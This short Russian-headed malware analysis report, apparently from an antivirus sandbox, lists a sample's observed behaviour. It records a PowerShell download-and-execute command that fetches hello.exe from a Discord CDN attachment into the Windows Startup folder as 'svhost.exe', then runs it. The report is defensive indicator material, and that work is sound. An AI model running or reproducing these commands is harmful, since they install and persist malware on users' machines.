Техническая информация
- https://cdn.discordapp.com/attachments/987171995647103007/1010258522283454544/hello.exe как %appdata%\microsoft\windows\start menu\programs\startup\svhost.exe
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- '<SYSTEM32>\cmd.exe' /c powershell -c (new-object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/987171995647103007/1010258522283454544/hello.exe', '%APPDATA%\Microsoft\Windows\Start Men...
- '<SYSTEM32>\cmd.exe' /c powershell start-process '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' start-process '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe'